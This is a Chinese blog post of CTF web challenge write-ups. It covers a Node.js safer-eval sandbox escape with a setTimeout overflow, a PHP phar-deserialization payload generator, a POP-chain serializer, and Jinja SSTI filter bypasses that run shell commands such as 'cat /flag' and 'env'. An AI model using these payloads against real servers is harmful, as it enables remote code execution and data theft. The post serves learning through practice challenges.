NSSCTF第15页(2)

最新推荐文章于 2024-07-24 10:40:52 发布
最新推荐文章于 2024-07-24 10:40:52 发布
阅读量198 收藏
点赞数
文章标签: 前端 javascript 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/134913737
版权

[GKCTF 2020]ez三剑客-easynode

有源代码,点进来看

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

 这道题主要涉及js代码,看着几个大佬的wp进行复现的

标红的地方看到了eval函数

查看版本发现了safer-eval是1.3.6版本的

发现存在该版本下的safe-eval沙箱逃逸

突围 ·期刊 #10 ·评论hol/safer-eval ·GitHub的

接下来就是这块:

app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

这里的意思就是。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay
然后作为timeout的值传入
显然。默认定义超时6秒。进入下个路由。
但是我们的代码不能超时6秒。也就不能进去下个路由执行沙盒逃逸了
那么问题就出在这个settimeout函数上。 

详解setTimeout()_settimeout函数-CSDN博客

https://www.cnblogs.com/beimingbingpo/p/8532023.html

delay传入4294967296。造成settimeout设置为1.
如果超过1毫秒。就进入eval
导致恶意代码被执行 

get:  /eval?delay=4294967296 

post:   e=setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();

[HNCTF 2022 WEEK3]ez_phar

看到源码,尝试访问upload.php

发现成功访问

 因为源码中存在file_exists()函数,可以利用phar反序列化

在PHP中的file_exists()函数-php教程-PHP中文网

PHP Phar反序列化总结_ctf phpphar反序列化-CSDN博客

基本思路就是利用上传的phar文件进行反序列化利用 

上传phar文件

<?php
class Flag{
    public $code = "system('cat /ffflllaaaggg');"; //system('ls /');
}
$a = new Flag();
 
 
$phar = new phar('b.phar');//对phar对象进行实例化,以便后续操作。
 
 
$phar -> startBuffering();//缓冲phar写操作(不用特别注意)
 
 
$phar -> setStub("<?php __HALT_COMPILER(); ?>");//设置stub,为固定格式
 
 
$phar -> setMetadata($a);//把我们的对象写进Metadata中
 
 
$phar -> addFromString("test.txt","helloworld!!");//写压缩文件的内容,这里没利用点,可以随便写
 
 
$phar -> stopBuffering();//停止缓冲
?> 

提示只能传图片上去

 修改一下后缀,得到flag

 [FSCTF 2023]ez_php2

参考nssctf大佬的wp复现出来,pop链的构造还是有很大的问题

<?php
Class Rd{
    public $ending;
    public $cl;
 
    public $poc;
}

class Poc{
    public $payload;
 
    public $fun;
}
 
class Er{
    public $symbol;
    public $Flag='cat /flag';//  ls /
 
}
 
class Ha{
    public $start;
    public $start1;
    public $start2="11111";
}
 
$a=new Ha();
$a->start1=new Rd();
$a->start=['POC'=>'1111'];
$a->start1->cl=new Er();
echo serialize($a);
?>

 

[GWCTF 2019]你的名字

输入{{7*7}}发现报错

 试了下{{7*7}}直接报错,还是报的php的错,但是{7*7}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %}

 [GWCTF 2019]你的名字-CSDN博客

大佬的这篇博客写的很详细

利用{% print %}可以发现有回显

{% print(lipsum|string|list) %}

 这里还得补充一点,{%print %}形式下,若果你构造的payload是正常的ssti用到的语句却没有回显,就说明你的语句中可能有关键字被过滤了,如{%print ‘’.class %}执行之后没有任何的回显,但{%print ‘’.clconfigass %}成功执行有回显,这说明class被过滤了

让看环境变量

1.拼接绕过

1.{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('env').read()%}

2.

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('env')['read']())%} 

 2.双写绕过

name={%print().__claconfigss__.__base__.__subclaconfigsses__()[258].__init__.__globals__['oconfigs'].popconfigen('env').read()%}

[NSSRound#8 Basic]Upload_gogoggo

是go语言的文件上传,第一次遇到

 NSSCTF Round#8 Basic-CSDN博客

弹shell一直没学会,暂时搁浅

呕...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
ASIS CTF Quals 2020 web复现
a3320315的博客
07-09 890
听说这期题目不错,就复现了一下,由难到易 Admin Panel 源码 app.js const express = require('express'); const app = express(); const session = require('express-session'); const db = require('better-sqlite3')('./db.db', {readonly: true}); const cookieParser = require("cookie-pars
NSSCTF第16(2)
wwwwyyyrre的博客
12-17 471
查看index.phpphpphpinfo();查看upload.phpphpecho "上传异常";else{");echo "ltj一眼就发现了phar";}else{echo $_FILES["file"]["name"] . " 文件已经存在";}else{echo "上传成功 ./upload/".$_FILES["file"]["name"];}else{echo "dky不喜欢这个文件 .".$extension;?
NSSCTF15(3)
wwwwyyyrre的博客
12-13 232
这道题有一个简单的反序列化,然后正则限制了很多函数看了wp才知道利用的函数是create_function()函数php//";看目录看flag。
NSSCTF15(1)
wwwwyyyrre的博客
12-09 136
点击read something,发现访问了百度读到了源码就是ssrf+flaskstr(ex)session伪造当时可以得到flag。知道了SECRET_KEY加密的方法是str(random.random() * 233)而random.random()为Mac地址读一下mac地址注意:uuid.getnode()返回的值是Mac值的16进制形式,但是去掉了中间的冒号。然后进行session解密得到加密形式开始加密传参得到flag。
NSSCTF第10(3)
wwwwyyyrre的博客
11-05 349
第一题:(1/?第三题:php// 第三个彩蛋!(看过头号玩家么?//(3/??第六题:wow 你找到了第二个彩蛋哦~_S0_ne3t?(2/?第七题:这个好像是最后一个个彩蛋拼接:_S0_ne3t?注意:题目给的提交的格式是NSSCTF{},因此:_S0_ne3t?
NSSCTF第16(3)
wwwwyyyrre的博客
12-18 204
只能使用一个字符,一个字符能够购买id4,于是我们需要找到一个字符比1337大的数字,前端html使用的是utf-8,后端python处理使用的是unicode,编码不一致造成了转码安全问题。在编码网站https://www.compart.com/en/unicode/,寻找大于1337的数字就可以得到flag。题目提示python unicode,利用的漏洞是unicode安全问题,是关于Unionde等价性的漏洞。就是在最开始找注入点的时候会卡一下,剩下的都还好。bp抓包发现切换面url是传参的。
NSSCTF第11(3)
wwwwyyyrre的博客
11-09 620
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
NSSCTF web 刷题记录2
rev1ve的博客
09-17 3271
源代码phpif(!|\&|\*|\?else{else{?':?"";if ((!break;break;?"";");?简单分析一下,首先是两个函数,功能分别为正则匹配一些字符;foreach循环检测每个值是否合法。然后就是swtich选择结构。我们思路是可以先看看hint有什么,为了绕过if条件判断,我们可以用%81去绕过,因为%81为不可见字符,escapeshellcmd又可以将不可见字符消除payload。
NSSCTF
weixin_43896504的博客
07-22 2337
NSSCTF
nssctf文件test
03-30
1
[SWPUCTF 2021 新生赛]traditional
03-15
首先,我们可以将八卦图方位转换为二进制数字,然后将其转换为十进制数字,最后将其转换为 ASCII 码。 在这个过程中,我们可以使用八卦图密码来加密和解密信息。八卦图密码是一种古典密码,它可以用来加密和解密...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
前端面试题日常练-day97 【Less】
qq_44640575的博客
07-20 474
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化面元素的边框样式。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 1001
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
TS如何处理js模块的类型?
最新发布
闻人放歌的三寸青草园圃
07-24 88
【代码】TS如何处理js模块的类型?
Odoo Registry 源码解读:前端世界的魔法师
清水欧度 Odoo ERP
07-23 947
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
基于 Gunicorn、Flask 和 Docker 的 Web 应用开发
2401_85639015的博客
07-19 1578
Docker 是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中。容器可以运行在任何支持 Docker 的机器上,确保了环境的一致性。通过本教程,你将学会如何使用 Docker、Gunicorn 和 Flask 构建一个高效、可扩展的 Web 应用。每个步骤都提供了详细的指导和示例代码,确保你能够理解和实践每个环节。希望本教程能够作为你进入微服务架构领域的起点。
nssctf的jwt问3
08-17
2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值